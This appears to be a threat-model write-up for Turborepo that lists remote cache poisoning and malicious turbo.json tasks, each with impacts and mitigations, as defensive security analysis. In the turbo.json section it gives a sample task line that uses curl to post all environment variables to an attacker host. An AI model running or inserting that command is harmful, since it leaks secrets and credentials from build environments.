attack-surface.md

Attack Surface Analysis for vercel/turborepo

Attack Surface: Remote Cache Poisoning

• 1. Remote Cache Poisoning

  • Description: An attacker gains unauthorized access to the remote cache and replaces legitimate build artifacts with malicious ones.
  • How Turborepo Contributes: Turborepo's remote caching feature is the direct mechanism enabling this attack. The feature's design and implementation are central to the vulnerability.
  • Example: An attacker compromises the AWS S3 bucket used for remote caching and replaces a compiled JavaScript library with a version containing a backdoor. Subsequent builds by all developers using the cache will include the backdoor.
  • Impact: Widespread compromise of applications built using the poisoned cache. Could lead to data breaches, code execution on user machines, and complete system compromise.
  • Risk Severity: Critical
  • Mitigation Strategies:
    • Strong Authentication & Authorization: Use short-lived, tightly scoped IAM roles/credentials for the remote cache provider (e.g., AWS, Vercel). Implement the principle of least privilege.
    • Secrets Management: Store and manage cache credentials securely using a secrets manager (e.g., HashiCorp Vault, AWS Secrets Manager). Rotate credentials regularly.
    • Network Security: Ensure secure communication (HTTPS) with the remote cache. Consider network segmentation to limit access to the cache.
    • Monitoring & Alerting: Implement monitoring and alerting for suspicious activity on the remote cache (e.g., unusual access patterns, large file modifications).
    • Cache Verification (Ideal): Advocate for and utilize (if available) features that verify the integrity of cached artifacts beyond just hashing (e.g., digital signatures).

Attack Surface: Malicious turbo.json Configuration

• 2. Malicious turbo.json Configuration

  • Description: An attacker modifies the turbo.json file to execute arbitrary commands or alter the build process in a harmful way.
  • How Turborepo Contributes: turbo.json is the core configuration file interpreted and acted upon directly by Turborepo. The vulnerability lies in Turborepo's execution of potentially malicious commands defined within this file.
  • Example: An attacker adds a task to turbo.json that runs a malicious script during the build process, exfiltrating environment variables or installing malware. For instance: "exfiltrate": "curl -X POST -d \"$(env)\" https://attacker.com/data".
  • Impact: Compromise of the build environment, potential for code execution on developer machines, and exfiltration of sensitive data.
  • Risk Severity: High
  • Mitigation Strategies:
    • Strict Code Review: Mandate thorough code reviews for all changes to turbo.json, focusing on task definitions and dependencies. Use a pull request/merge request workflow.
    • Repository Security: Implement strong repository security measures (e.g., branch protection rules, multi-factor authentication for repository access).
    • Input Validation (Ideal): Turborepo could implement stricter validation of the turbo.json schema to prevent dangerous configurations.
    • Least Privilege (Build Environment): Run build processes with the least necessary privileges. Avoid running builds as root or with overly broad permissions.